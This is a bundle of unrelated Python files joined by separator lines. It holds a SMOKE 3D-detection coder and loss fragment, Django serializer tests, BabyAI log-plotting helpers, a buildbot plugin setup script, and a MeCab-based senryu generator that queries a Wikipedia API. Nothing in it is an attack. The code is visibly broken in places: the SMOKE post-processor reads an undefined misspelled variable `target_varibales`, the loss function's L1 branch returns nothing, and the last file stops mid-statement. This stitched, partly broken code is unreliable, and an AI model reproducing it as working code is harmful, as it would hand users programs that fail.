depths,
Ks,
trans_mats):
'''
retrieve objects location in camera coordinate based on projected points
Args:
points: projected points on feature map in (x, y)
points_offset: project points offset in (delata_x, delta_y)
depths: object depth z
Ks: camera intrinsic matrix, shape = [N, 3, 3]
trans_mats: transformation matrix from image to feature map, shape = [N, 3, 3]
Returns:
locations: objects location, shape = [N, 3]
'''
# batch_size = trans_mats.shape[0]
# sub = torch.zeros(batch_size, 1, 3).float().to(trans_mats.device)
# sub[..., 2] = 1
# if (trans_mats.shape[1] == 2):
# trans_mats = torch.cat((trans_mats, sub), 1)
device = points.device
tensor_type = depths.type()
points = points.type(tensor_type)
points_offset = points_offset.type(tensor_type)
depths = depths.type(tensor_type)
Ks = Ks.type(tensor_type)
trans_mats = trans_mats.type(tensor_type)
points = points.to(device=device)
points_offset = points_offset.to(device=device)
depths = depths.to(device=device)
Ks = Ks.to(device=device)
trans_mats = trans_mats.to(device=device)
# number of points
N = points_offset.shape[1]
# batch size
N_batch = Ks.shape[0]
Ks_inv = Ks.inverse()
proj_points = points.type(tensor_type) + points_offset.type(tensor_type)
# transform project points in homogeneous form.
proj_points_extend = torch.cat(
(proj_points, torch.ones(N_batch, N, 1).type(tensor_type).to(device=device)), dim=2)
# transform project points back on image
proj_points_extend = proj_points_extend.type_as(trans_mats)
trans_mats = trans_mats.repeat(N, 1, 1)
proj_points_extend = proj_points_extend.view(-1, 3, 1)
proj_points_img = torch.matmul(trans_mats, proj_points_extend)
# with depth
proj_points_img = proj_points_img * depths.view(-1, 1, 1)
# transform image coordinates back to object locations
Ks_inv = Ks_inv.type_as(proj_points_img)
Ks_inv = Ks_inv.repeat(N, 1, 1)
locations = torch.matmul(Ks_inv, proj_points_img)
return locations.squeeze(2)
def decode_dimension(self, cls_id, dims_offset):
'''
retrieve object dimensions
Args:
cls_id: each object id
dims_offset: dimension offsets, shape = (N, 3)
Returns:
'''
cls_id = cls_id.flatten().long()
dims_select = self.dim_ref[cls_id, :]
dims_offset = dims_offset.view(-1, 3)
dims_select = dims_select.to(device=dims_offset.device)
dimensions = dims_offset.exp() * dims_select
return dimensions
def decode_orientation(self, vector_ori, locations, flip_mask=None):
'''
retrieve object orientation
Args:
vector_ori: local orientation in [sin, cos] format
locations: object location
Returns: for training we only need roty
for testing we need both alpha and roty
'''
device = locations.device
tensor_type = locations.type()
vector_ori = vector_ori.type(tensor_type)
vector_ori = vector_ori.to(device=device)
locations = locations.view(-1, 3)
vector_ori = vector_ori.view(-1, 2)
rays = torch.atan(locations[:, 0] / (locations[:, 2] + 1e-7))
alphas = torch.atan(vector_ori[:, 0] / (vector_ori[:, 1] + 1e-7))
# get cosine value positive and negtive index.
cos_pos_idx = (vector_ori[:, 1] >= 0).nonzero()
cos_neg_idx = (vector_ori[:, 1] < 0).nonzero()
alphas[cos_pos_idx] -= math.pi / 2
alphas[cos_neg_idx] += math.pi / 2
# retrieve object rotation y angle.
rotys = alphas + rays
# in training time, it does not matter if angle lies in [-PI, PI]
# it matters at inference time? todo: does it really matter if it exceeds.
larger_idx = (rotys > math.pi).nonzero()
small_idx = (rotys < -math.pi).nonzero()
if len(larger_idx) != 0:
rotys[larger_idx] -= 2 * math.pi
if len(small_idx) != 0:
rotys[small_idx] += 2 * math.pi
if flip_mask is not None:
flip_mask = flip_mask.view(-1, 1)
fm = flip_mask.flatten()
rotys_flip = fm.float() * rotys
rotys_flip_pos_idx = rotys_flip > 0
rotys_flip_neg_idx = rotys_flip < 0
rotys_flip[rotys_flip_pos_idx] -= math.pi
rotys_flip[rotys_flip_neg_idx] += math.pi
rotys_all = fm.float() * rotys_flip + (1 - fm.float()) * rotys
return rotys_all, alphas
else:
return rotys, alphas
class SMOKELossComputation():
def __init__(self,
smoke_coder,
cls_loss,
reg_loss,
loss_weight,
max_objs):
self.smoke_coder = smoke_coder
self.cls_loss = cls_loss
self.reg_loss = reg_loss
self.loss_weight = loss_weight
self.max_objs = max_objs
def prepare_targets(self, targets):
heatmaps = targets["hm"]
regression = targets["reg"]
cls_ids = targets["cls_ids"]
proj_points = targets["proj_points"]
dimensions = targets["dimensions"]
locations = targets["locations"]
rotys = targets["rotys"]
trans_mat = targets["trans_mat"]
K = targets["K"]
reg_mask = targets["reg_mask"]
flip_mask = targets["flip_mask"]
return heatmaps, regression, dict(cls_ids=cls_ids,
proj_points=proj_points,
dimensions=dimensions,
locations=locations,
rotys=rotys,
trans_mat=trans_mat,
K=K,
reg_mask=reg_mask,
flip_mask=flip_mask)
def prepare_predictions(self, targets_variables, pred_regression):
batch, channel = pred_regression.shape[0], pred_regression.shape[1]
targets_proj_points = targets_variables["proj_points"]
# obtain prediction from points of interests
pred_regression_pois = select_point_of_interest(
batch, targets_proj_points, pred_regression
)
# pred_regression_pois = pred_regression_pois.view(-1, channel)
# FIXME: fix hard code here
pred_depths_offset = pred_regression_pois[..., 0:1]
pred_proj_offsets = pred_regression_pois[..., 1:3]
pred_dimensions_offsets = pred_regression_pois[..., 3:6]
pred_orientation = pred_regression_pois[..., 6:]
pred_depths = self.smoke_coder.decode_depth(pred_depths_offset)
pred_locations = self.smoke_coder.decode_location(
targets_proj_points,
pred_proj_offsets,
pred_depths,
targets_variables["K"],
targets_variables["trans_mat"]
)
pred_dimensions = self.smoke_coder.decode_dimension(
targets_variables["cls_ids"],
pred_dimensions_offsets,
)
# we need to change center location to bottom location
pred_locations[:, 1] += pred_dimensions[:, 1] / 2
pred_rotys, pred_alphas = self.smoke_coder.decode_orientation(
pred_orientation,
targets_variables["locations"],
targets_variables["flip_mask"]
)
pred_rotys = pred_rotys.view(batch, -1, 1)
pred_alphas = pred_alphas.view(batch, -1, 1)
if self.reg_loss == "DisL1":
pred_box3d_rotys = self.smoke_coder.encode_box3d(
pred_rotys,
targets_variables["dimensions"],
targets_variables["locations"]
)
pred_box3d_dims = self.smoke_coder.encode_box3d(
targets_variables["rotys"],
pred_dimensions,
targets_variables["locations"]
)
pred_box3d_locs = self.smoke_coder.encode_box3d(
targets_variables["rotys"],
targets_variables["dimensions"],
pred_locations
)
return dict(ori=pred_box3d_rotys,
dim=pred_box3d_dims,
loc=pred_box3d_locs, )
elif self.reg_loss == "L1":
pred_box_3d = self.smoke_coder.encode_box3d(
pred_rotys,
pred_dimensions,
pred_locations
)
return pred_box_3d
def __call__(self, predictions, targets):
pred_heatmap, pred_regression = predictions[0], predictions[1]
targets_heatmap, targets_regression, targets_variables \
= self.prepare_targets(targets)
predict_boxes3d = self.prepare_predictions(targets_variables, pred_regression)
hm_loss = self.cls_loss(pred_heatmap, targets_heatmap) * self.loss_weight[0]
targets_regression = targets_regression.view(
-1, targets_regression.shape[2], targets_regression.shape[3]
)
reg_mask = targets_variables["reg_mask"].flatten()
reg_mask = reg_mask.view(-1, 1, 1)
reg_mask = reg_mask.expand_as(targets_regression)
if self.reg_loss == "DisL1":
reg_loss_ori = F.l1_loss(
predict_boxes3d["ori"] * reg_mask,
targets_regression * reg_mask,
reduction="sum") / (self.loss_weight[1] * self.max_objs)
reg_loss_dim = F.l1_loss(
predict_boxes3d["dim"] * reg_mask,
targets_regression * reg_mask,
reduction="sum") / (self.loss_weight[1] * self.max_objs)
reg_loss_loc = F.l1_loss(
predict_boxes3d["loc"] * reg_mask,
targets_regression * reg_mask,
reduction="sum") / (self.loss_weight[1] * self.max_objs)
loss_all = hm_loss + reg_loss_ori + reg_loss_dim + reg_loss_loc
loss_dict = {}
loss_dict["hm"] = hm_loss.item()
loss_dict["ori"] = reg_loss_ori.item()
loss_dict["dim"] = reg_loss_dim.item()
loss_dict["loc"] = reg_loss_loc.item()
return loss_all, loss_dict, {}
class PostProcessor(nn.Module):
def __init__(self,
smoker_coder,
reg_head,
det_threshold,
max_detection,
pred_2d):
super(PostProcessor, self).__init__()
self.smoke_coder = smoker_coder
self.reg_head = reg_head
self.det_threshold = det_threshold
self.max_detection = max_detection
self.pred_2d = pred_2d
def prepare_targets(self, targets):
dict_ret = {}
dict_ret["trans_mat"] = targets["trans_mat"].view(1,3,3)
dict_ret["K"] = targets["K"].view(1,3,3)
dict_ret["size"] = targets["size"].view(1,2)
return None, None, dict_ret
def forward(self, predictions, targets):
pred_heatmap, pred_regression = predictions[0], predictions[1]
batch, channel = pred_regression.shape[0], pred_regression.shape[1]
        _, _, target_variables = self.prepare_targets(targets)
heatmap = nms_hm(pred_heatmap)
scores, indexs, clses, ys, xs = select_topk(
heatmap,
K=self.max_detection,
)
pred_regression_pois = select_point_of_interest(
batch, indexs, pred_regression
)
pred_proj_points = torch.cat([xs.view(batch, -1, 1), ys.view(batch, -1, 1)], dim=2)
# FIXME: fix hard code here
# pred_regression_pois = pred_regression_pois.view(-1, channel)
pred_depths_offset = pred_regression_pois[..., 0:1]
pred_proj_offsets = pred_regression_pois[..., 1:3]
pred_dimensions_offsets = pred_regression_pois[..., 3:6]
pred_orientation = pred_regression_pois[..., 6:]
pred_depths = self.smoke_coder.decode_depth(pred_depths_offset)
pred_locations = self.smoke_coder.decode_location(
pred_proj_points,
pred_proj_offsets,
pred_depths,
target_varibales["K"],
target_varibales["trans_mat"]
)
pred_dimensions = self.smoke_coder.decode_dimension(
clses,
pred_dimensions_offsets
)
# we need to change center location to bottom location
pred_locations[:, 1] += pred_dimensions[:, 1] / 2
pred_rotys, pred_alphas = self.smoke_coder.decode_orientation(
pred_orientation,
pred_locations
)
if self.pred_2d:
box2d = self.smoke_coder.encode_box2d(
target_varibales["K"],
pred_rotys,
pred_dimensions,
pred_locations,
target_varibales["size"]
)
else:
box2d = torch.tensor([0, 0, 0, 0])
# change variables to the same dimension
clses = clses.view(batch, self.max_detection, 1)
pred_alphas = pred_alphas.view(batch, self.max_detection, 1)
box2d = box2d.view(batch, self.max_detection, 4)
pred_rotys = pred_rotys.view(batch, self.max_detection, 1)
scores = scores.view(batch, self.max_detection, 1)
# change dimension back to h,w,l
pred_dimensions = pred_dimensions.roll(shifts=-1, dims=1)
pred_dimensions = pred_dimensions.view(batch, self.max_detection, -1)
pred_locations = pred_locations.view(batch, self.max_detection, -1)
recall_dict = {}
pred_dicts = []
for index in range(batch):
pred_boxes = [pred_locations[index], pred_dimensions[index], pred_rotys[index]]
pred_boxes = torch.cat(pred_boxes, dim=1)
record_dict = {
'pred_boxes': pred_boxes,
'pred_scores': scores[index],
'pred_labels': clses[index]
}
pred_dicts.append(record_dict)
# result = [clses, pred_alphas, box2d, pred_dimensions, pred_locations, pred_rotys, scores]
# result = [i.type_as(result[0]) for i in result]
# result = torch.cat(result, dim=1)
return pred_dicts, recall_dict
class SMOKEHead(nn.Module):
def __init__(self, num_class, input_channels, model_cfg, predict_boxes_when_training=False, **kwargs):
super(SMOKEHead, self).__init__()
heads = {}
heads["hm"] = num_class
heads["wh"] = model_cfg.HEAD_INFO.WH
heads["reg"] = model_cfg.HEAD_INFO.REG
heads["reg_c"] = model_cfg.HEAD_INFO.REG_C
heads["class"] = model_cfg.HEAD_INFO.CLASS_NAMES
heads["norm"] = model_cfg.HEAD_INFO.NORM_FUNC
heads["dep"] = model_cfg.HEAD_INFO.DEP
heads["rot"] = model_cfg.HEAD_INFO.ROT
heads["dim"] = model_cfg.HEAD_INFO.DIM
self.predictor = SMOKEPredictor(heads, input_channels)
def forward(self, features):
x = self.predictor(features)
return x
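# Hedged usage sketch (not part of the original module): SMOKECoder maps network
# offsets back to metric quantities. The depth_ref / dim_ref numbers below are
# illustrative placeholders, not trained dataset statistics.
if __name__ == "__main__":
    coder = SMOKECoder(depth_ref=(28.01, 16.32),
                       dim_ref=((3.88, 1.63, 1.53),   # placeholder class-0 dimensions
                                (1.78, 0.58, 0.88)),  # placeholder class-1 dimensions
                       device="cpu")
    # Depth offsets map back to metric depth as depth = offset * ref[1] + ref[0].
    print(coder.decode_depth(torch.tensor([[0.0], [1.0]])))
    # Zero dimension offsets recover the per-class reference dimensions (exp(0) == 1).
    print(coder.decode_dimension(torch.tensor([0, 1]), torch.zeros(2, 3)))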
|
from django.test import TestCase
from django.forms.models import model_to_dict
from nose.tools import eq_
from apps.assist.unittests.factories import NoticeFactory, BannerFactory, SplashFactory
from apps.assist.serializers import NoticeCreateSerializer, BannerCreateSerializer, SplashCreateSerializer
class TestNoticeSerializer(TestCase):
def setUp(self):
self.data = model_to_dict(NoticeFactory.build())
def test_serializer_with_empty_data(self):
serializer = NoticeCreateSerializer(data={})
eq_(serializer.is_valid(), False)
def test_serializer_with_valid_data(self):
serializer = NoticeCreateSerializer(data=self.data)
eq_(serializer.is_valid(), True)
class TestBannerSerializer(TestCase):
def setUp(self):
self.data = model_to_dict(BannerFactory.build())
def test_serializer_with_empty_data(self):
serializer = BannerCreateSerializer(data={})
eq_(serializer.is_valid(), False)
def test_serializer_with_valid_data(self):
serializer = BannerCreateSerializer(data=self.data)
eq_(serializer.is_valid(), True)
class TestSplashSerializer(TestCase):
def setUp(self):
self.data = model_to_dict(SplashFactory.build())
def test_serializer_with_empty_data(self):
serializer = SplashCreateSerializer(data={})
eq_(serializer.is_valid(), False)
def test_serializer_with_valid_data(self):
serializer = SplashCreateSerializer(data=self.data)
eq_(serializer.is_valid(), True)
|
"""Loading and plotting data from CSV logs.
Schematic example of usage
- load all `log.csv` files that can be found by recursing a root directory:
`dfs = load_logs($BABYAI_STORAGE)`
- concatenate them in the master dataframe
`df = pandas.concat(dfs, sort=True)`
- plot average performance for groups of runs using `plot_average(df, ...)`
- plot performance for each run in a group using `plot_all_runs(df, ...)`
Note:
- you can choose what to plot
- groups are defined by regular expressions over full paths to .csv files.
For example, if your model is called "model1" and you trained it with multiple seeds,
you can filter all the respective runs with the regular expression ".*model1.*"
- you may want to load your logs from multiple storage directories
before concatening them into a master dataframe
"""
import os
import re
import numpy as np
from matplotlib import pyplot
import pandas
import random
def load_log(dir_):
"""Loads log from a directory and adds it to a list of dataframes."""
#dir_ = dir_.decode("utf-8")
df = pandas.read_csv(os.path.join(*[dir_, 'log.csv']),
error_bad_lines=False,
warn_bad_lines=True)
if not len(df):
print("empty df at {}".format(dir_))
return
df['model'] = dir_
return df
def load_logs(root):
dfs = []
for root, dirs, files in os.walk(root, followlinks=True):
for file_ in files:
if file_ == 'log.csv':
dfs.append(load_log(root))
return dfs
def plot_average_impl(df, regexps, y_value='return_mean', window=1, agg='mean',
x_value='frames'):
"""Plot averages over groups of runs defined by regular expressions."""
df = df.dropna(subset=[y_value])
unique_models = df['model'].unique()
model_groups = [[m for m in unique_models if re.match(regex, m)]
for regex in regexps]
for regex, models in zip(regexps, model_groups):
df_re = df[df['model'].isin(models)]
# the average doesn't make sense if most models are not included,
        # so we only use the period of training that has been completed by all models
num_frames_per_model = [df_model[x_value].max()
for _, df_model in df_re.groupby('model')]
median_progress = sorted(num_frames_per_model)[(len(num_frames_per_model) - 1) // 2]
mean_duration = np.mean([
df_model['duration'].max() for _, df_model in df_re.groupby('model')])
df_re = df_re[df_re[x_value] <= median_progress]
# smooth
parts = []
for _, df_model in df_re.groupby('model'):
df_model = df_model.copy()
df_model.loc[:, y_value] = df_model[y_value].rolling(window).mean()
parts.append(df_model)
df_re = pandas.concat(parts)
df_agg = df_re.groupby([x_value]).agg([agg])
values = df_agg[y_value][agg]
pyplot.plot(df_agg.index, values, label=regex)
#print(values)
#print(regex, median_progress, mean_duration / 86400.0, values.iloc[-1])
#pyplot.show()
pyplot.show()
def plot_average(*args, **kwargs):
"""Plot averages over groups of runs defined by regular expressions."""
pyplot.figure(figsize=(15, 5))
plot_average_impl(*args, **kwargs)
pyplot.legend()
def plot_all_runs(df, regex, quantity='return_mean', x_axis='frames', window=1, color=None):
"""Plot a group of runs defined by a regex."""
pyplot.figure(figsize=(15, 5))
df = df.dropna(subset=[quantity])
kwargs = {}
if color:
kwargs['color'] = color
unique_models = df['model'].unique()
models = [m for m in unique_models if re.match(regex, m)]
df_re = df[df['model'].isin(models)]
for model, df_model in df_re.groupby('model'):
values = df_model[quantity]
values = values.rolling(window).mean()
pyplot.plot(df_model[x_axis],
values,
label=model,
**kwargs)
#print(model, df_model[x_axis].max())
pyplot.legend()
def plot_mean_std(dfs, color=None, y_value='validation_success_rate', show_std=False, label=None,plot_all=True, linestyle=None, compute_90val_suc_rate=False, ax=None, marker=None, plot_trend=False):
if y_value == 'validation_success_rate':
for df in dfs:
# convert success rate to percentage
df[y_value] *= 100
# if y_value == 'val_cic':
# # scale for better readability
# for df in dfs:
# df[y_value] *= 1000
df_concat = pandas.concat((dfs))
by_row_index = df_concat.groupby(df_concat.index)
df_means = by_row_index.mean()[y_value]
df_stds = by_row_index.std()[y_value]
num_points = len(df_means)
x = np.arange(1, num_points + 1)
if ax:
ax.plot(x, df_means, label=label, color=color, linestyle=linestyle, marker=marker)
else:
fig, ax = pyplot.subplots()
ax.plot(x, df_means, label=label, color=color, linestyle=linestyle, marker=marker)
ax.xaxis.set_major_locator(pyplot.MaxNLocator(5))
if compute_90val_suc_rate:
print('90% val success rate reached at epoch:')
threshold_idx = next(x[0] + 1 for x in enumerate(list(df_means)) if x[1] >= 90.0)
print(threshold_idx)
if plot_trend:
z = np.polyfit(x, df_means, 1)
p = np.poly1d(z)
pyplot.plot(x, p(x), color="#fc8d62", linestyle="--")
if plot_all:
for df in dfs:
x = np.arange(1, len(df) + 1)
if ax:
ax.plot(x, df[y_value], alpha=0.25, label='_nolegend_', color=color, linestyle=linestyle) #, linewidth=0.5) #, marker=marker)
else:
pyplot.plot(x, df[y_value], alpha=0.25, label='_nolegend_',color=color, linestyle=linestyle) #, linewidth=0.5) #, marker=marker)
if show_std:
pyplot.fill_between(x, df_means - df_stds, df_means + df_stds, facecolor=color, alpha=0.5)
def plot_compared_models(log_roots, nr_runs, title, legend_labels=None, max_update=35, show_std=False, plot_all=True, y_value='validation_success_rate', filename=None, compute_90val_suc_rate=False, plot_trend=False):
pyplot.rc('font', size=18) #14-18
#colors = ['#66c2a5', '#fc8d62', '#ffd92f', '#8da0cb', '#e78ac3', '#a6d854']
colors = ['#fc8d62', '#66c2a5', '#8da0cb', '#e78ac3', '#a6d854', '#ffd92f']
markers = ['o', 'v', '^', 's', '+', 'x']
if legend_labels is None:
legend_labels = [root.split('/')[-1] for root in log_roots]
fig, ax = pyplot.subplots(figsize=(7,5)) #(12,5)
for idx, root in enumerate(log_roots):
dirs = [root + str(i) for i in range(1, nr_runs + 1)]
dfs = []
        for dir in dirs:
            try:
                dfs += [load_log(dir).query('update <= ' + str(max_update))]
            except Exception:
                # Skip runs whose logs are missing or cannot be parsed.
                pass
plot_mean_std(dfs, label=legend_labels[idx], show_std=show_std,plot_all=plot_all,color=colors[idx], marker=markers[idx], y_value=y_value, compute_90val_suc_rate=compute_90val_suc_rate, plot_trend=plot_trend, ax=ax)
pyplot.xlabel('epochs')
if y_value == 'validation_success_rate':
pyplot.ylabel('validation success %')
pyplot.ylim(0, 102)
elif y_value == 'correction_weight_loss':
pyplot.ylabel('guidance weight')
elif y_value == 'val_cic':
#pyplot.ylabel(r'CIC $\times 10^3$')
pyplot.ylabel('CIC')
#pyplot.title(title)
pyplot.legend(loc=4)
#pyplot.legend(loc='upper center', bbox_to_anchor=(0.5, -0.5))
pyplot.tight_layout()
#pyplot.show()
pyplot.savefig(filename)
pyplot.clf()
def plot_cic(cic_file):
    """Plot the per-epoch CIC values stored one per line in a text file."""
with open(cic_file, 'r') as cf:
values = [float(item) for item in cf.readlines()]
pyplot.plot(np.arange(1, len(values) + 1), values, '-o')
pyplot.xlabel('epoch')
pyplot.ylabel('CIC metric')
pyplot.title('CIC in Learner + pretrained Corrector, GoToObj')
pyplot.show()
def plot_two_vars(log_root, nr_runs, vars, title, max_update=200, show_std=False, plot_all=True, filename=None):
    """Plot two quantities from the same runs on twin y-axes and save the figure to filename."""
pyplot.rc('font', size=13) # 18
colors = ['#fc8d62', '#66c2a5', '#8da0cb', '#e78ac3', '#a6d854', '#ffd92f']
linestyles = ['-', '--', '-.', (0, (5, 1)), (0, (3, 1, 1, 1)), (0, (1, 1))]
fig, ax1 = pyplot.subplots()
dirs = [log_root + str(i) for i in range(1, nr_runs + 1)]
dfs = []
    for dir in dirs:
        # print(dir)
        try:
            dfs += [load_log(dir).query('update <= ' + str(max_update))]
        except Exception:
            # Skip runs whose logs are missing or cannot be parsed.
            pass
ax1.set_xlabel('epochs')
ax1.set_ylabel('validation success %', color=colors[0])
plot_mean_std(dfs, label=vars[0], show_std=show_std, plot_all=plot_all, color=colors[0],
linestyle=linestyles[0], y_value=vars[0], ax = ax1)
ax1.tick_params(axis='y', labelcolor=colors[0])
ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis
ax2.set_ylabel('guidance weight', color=colors[1]) # we already handled the x-label with ax1
plot_mean_std(dfs, label=vars[1], show_std=show_std, plot_all=plot_all, color=colors[1],
linestyle=linestyles[1], y_value=vars[1], ax=ax2)
ax2.tick_params(axis='y', labelcolor=colors[1])
fig.tight_layout() # otherwise the right y-label is slightly clipped
pyplot.title(title)
#pyplot.show()
pyplot.savefig(filename)
pyplot.clf()
# EXAMPLES
#
# roots = ['/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-nocor',
# '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-pretrainedcor-ownvocab',
# '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-pretrainedcor-gotolocal',
# '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-pretrainedcor-putnextlocal',
# '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-pretrainedlearner-gotolocal',
# '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-pretrainedlearner-putnextlocal',
# # '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-pretrainedcor-multicor'
# ]
#
# labels = ['Learner',
# 'Learner + Guide, pretrained at same level',
# 'Learner + Guide, pretrained at GoToLocal',
# 'Learner + Guide, pretrained at PutNextLocal',
# 'Learner, pretrained at GoToLocal',
# 'Learner, pretrained at PutNextLocal'
# #'Learner + Guide, \n pretrained at 3 levels'
# ]
#
# plot_compared_models(log_roots=roots, nr_runs=3, title='PickupLoc', legend_labels=labels,
# max_update=25,
# plot_all=False,
# filename='pickuploc-interlevel.pdf')
# roots = ['/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/gotoobj/gotoobj-pretrainedcor-cic',
# '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/gotolocal/gotolocal-pretrainedcor-cic',
# '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/gotoobjmaze/gotoobjmaze-pretrainedcor-cic',
# '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-pretrainedcor-cic',
# '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/putnextlocal/putnextlocal-pretrainedcor-cic',
# '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/goto/goto-pretrainedcor-ownvocab',
# ]
#
# labels = ['GoToObj',
# 'GoToLocal',
# 'GoToObjMaze',
# 'PickupLoc',
# 'PutNextLocal',
# 'GoTo'
# ]
#
# epochs = [20,
# 25,
# 8,
# 25,
# 25,
# 25
# ]
#
# for idx, root in enumerate(roots):
# label = [labels[idx]]
# plot_compared_models(log_roots=[root], nr_runs=3, title='CIC',
# legend_labels=label, max_update=epochs[idx],
# y_value='val_cic',
# show_std=True,
# plot_all=False,
# filename=str(label) + '-cic.pdf',
# plot_trend=True)
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function
try:
from buildbot_pkg import setup_www_plugin
except ImportError:
import sys
print("Please install buildbot_pkg module in order to install that package, or use the pre-build .whl modules available on pypi", file=sys.stderr)
sys.exit(1)
setup_www_plugin(
name='dashboard-test',
description='',
author=u'Pierre Tardy',
author_email=u'tardyp@gmail.com',
url='/',
license='Apache-2.0',
packages=['dashboard_test'],
package_data={
'': [
'VERSION',
'static/*'
]
},
entry_points="""
[buildbot.www]
dashboard_test = dashboard_test:ep
""",
)
|
# Additional libraries
import urllib.parse
import urllib.request
import xml.etree.ElementTree as elementtree
import MeCab
import random
WIKI_URL = u"http://wikipedia.simpleapi.net/api?keyword="
class CreateResult:
    """Holds the generated senryu, its reading (furigana), and any error information."""
    senryu = ''
furigana = ''
errormessage = ''
word = ''
url = ''
def createSenryu(serch_word):
utftext = serch_word.encode('utf-8')
urlencode = urllib.parse.quote(utftext, '')
request = urllib.request.Request(WIKI_URL + urlencode)
result = CreateResult()
with urllib.request.urlopen(request) as response:
XmlData = response.read()
if len(XmlData) == 0:
result.errormessage = 'Wikipediaに該当ページがありませんでした。'
return result
root = elementtree.fromstring(XmlData)
if len(root) == 0:
result.errormessage = 'Wikipediaに該当ページがありませんでした。'
return result
result.url = root[0][2].text
result.word = root[0][3].text
tagger = MeCab.Tagger('-Ochasen')
nodes = tagger.parseToNode(root[0][4].text)
bunsetsulist = []
PoemPartslist = []
kamigolist = []
nakashichilist = []
shimogolist = []
spellCount = 0
while nodes:
        # This loop is long and should be split up, but no good approach came to mind, so it is left as-is.
splitData = nodes.feature.split(',')
SplitLength = len(splitData)
if SplitLength <= 7:
bunsetsulist = []
spellCount= 0
nodes = nodes.next
continue
furigana = splitData[7]
furiganaCount = mojiCount(furigana)
spellCount += furiganaCount
bunsetsulist.append(nodes)
if splitData[0] in '記号':
bunsetsulist = []
spellCount= 0
nodes = nodes.next
continue
if splitData[0] in '助詞' and len(bunsetsulist) == 1:
bunsetsulist = []
spellCount= 0
nodes = nodes.next
continue
if splitData[0] in '助動詞' and len(bunsetsulist) == 1:
bunsetsulist = []
spellCount= 0
nodes = nodes.next
continue
if splitData[1] in '非自立' and len(bunsetsulist) == 1:
bunsetsulist = []
spellCount= 0
nodes = nodes.next
continue
if splitData[1] in '接尾' and len(bunsetsulist) == 1:
bunsetsulist = []
spellCount= 0
nodes = nodes.next
continue
if splitData[5] in '未然レル接続' and (furiganaCount == 5 or furiganaCount == 7):
bunsetsulist = []
spellCount= 0
nodes = nodes.next
continue
if splitData[0] in '接頭詞' and (furiganaCount == 5 or furiganaCount == 7):
bunsetsulist = []
spellCount= 0
nodes = nodes.next
continue
if furigana in '*':
bunsetsulist = []
spellCount= 0
nodes = nodes.next
continue
if is_sokuon(furigana[-1]) and (furiganaCount == 5 or furiganaCount == 7):
bunsetsulist = []
spellCount= 0
nodes = nodes.next
continue
if spellCount == 5:
            gobiindex = len(bunsetsulist)
            if IsKire(bunsetsulist[gobiindex - 1]):
kamigolist.append(list(bunsetsulist))
shimogolist.append(list(bunsetsulist))
else:
kamigolist.append(list(bunsetsulist))
if spellCount == 7:
nakashichilist.append(list(bunsetsulist))
bunsetsulist = []
spellCount= 0
if furiganaCount == 7 :
nodes = nodes.next
continue
if spellCount > 7:
bunsetsulist = []
spellCount= 0
if furiganaCount > 7 :
nodes = nodes.next
continue
nodes = nodes.next
furigana = ''
senryu = ''
bunsho = []
create = False
for count in range(10):
        # This loop is long and should be split up, but no good approach came to mind, so it is left as-is.
furigana = ''
senryu = ''
bunsho = []
create = False
if len(kamigolist) == 0 or len(nakashichilist) == 0 or len(shimogolist) == 0:
result.errormessage = '句の素材がたりず、生成できませんでした。'
return result
kamigo = random.choice(kamigolist)
nakashichi = random.choice(nakashichilist)
shimogo = random.choice(shimogolist)
kamigofurigana = ''
nakahachifurigana = ''
simogofurigana = ''
for spell in kamigo:
senryu += spell.surface
kamigofurigana += spell.feature.split(',')[7]
bunsho.append(spell)
for spell in nakashichi:
senryu += spell.surface
nakahachifurigana += spell.feature.split(',')[7]
bunsho.append(spell)
for spell in shimogo:
senryu += spell.surface
simogofurigana += spell.feature.split(',')[7]
bunsho.append(spell)
furigana += kamigofurigana
furigana += nakahachifurigana
furigana += simogofurigana
        # Regenerate if the opening five-syllable part (kamigo) and the closing five-syllable part (shimogo) are identical.
if kamigofurigana == simogofurigana:
continue
        # Regenerate if the middle seven-syllable part (nakashichi) contains the opening five-syllable part.
if nakahachifurigana.find(kamigofurigana) != -1:
continue
        # Regenerate if the middle seven-syllable part contains the closing five-syllable part.
if nakahachifurigana.find(simogofurigana) != -1:
continue
        # Regenerate if all three parts (5-7-5) end with a cut (kire).
Kamigokire = IsKire(kamigo[len(kamigo) - 1])
Nakahachikire = IsKire(nakashichi[len(nakashichi) - 1])
Shimogokire = IsKire(shimogo[len(shimogo) - 1])
if Kamigokire and Nakahachikire and Shimogokire:
continue
        # Regenerate if the poem contains two or more verbs.
doshicount = 0
for spell in bunsho:
splitData = spell.feature.split(',')
if splitData[0] in '動詞':
doshicount+= 1
if doshicount >= 2:
continue
create = True
break
    if not create:
result.errormessage = '川柳が作成できませんでした。別の単語を入力してください。'
return result
result.senryu = senryu
result.furigana = furigana
return result
def IsKire(nodes):
splitData = nodes.feature.split(',')
if splitData[5] in '基本形':
return True
elif splitData[0] in '名詞':
return True
else:
return False
def mojiCount(furigana):
mojicount = 0
for moji in furigana:
        if not is_youon(moji):
            mojicount += 1
return mojicount
def is_youon(moji):
youon = ['ぁ',
'ぃ',
'ぅ',
'ぇ',
'ぉ',
'ゃ',
'ゅ',
'ょ',
'ァ',
'ィ',
'ゥ',
'ェ',
'ォ',
'ャ',
'ュ',
'ョ']
return moji in youon
def is_sokuon(moji):
sokuon = ['っ','ッ']
return moji in sokuon
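# A minimal usage sketch (not part of the original module). It assumes MeCab and its
# dictionary are installed and that the Wikipedia API above is reachable; the keyword
# below is purely illustrative.
if __name__ == '__main__':
    sample = createSenryu('猫')
    if sample.errormessage:
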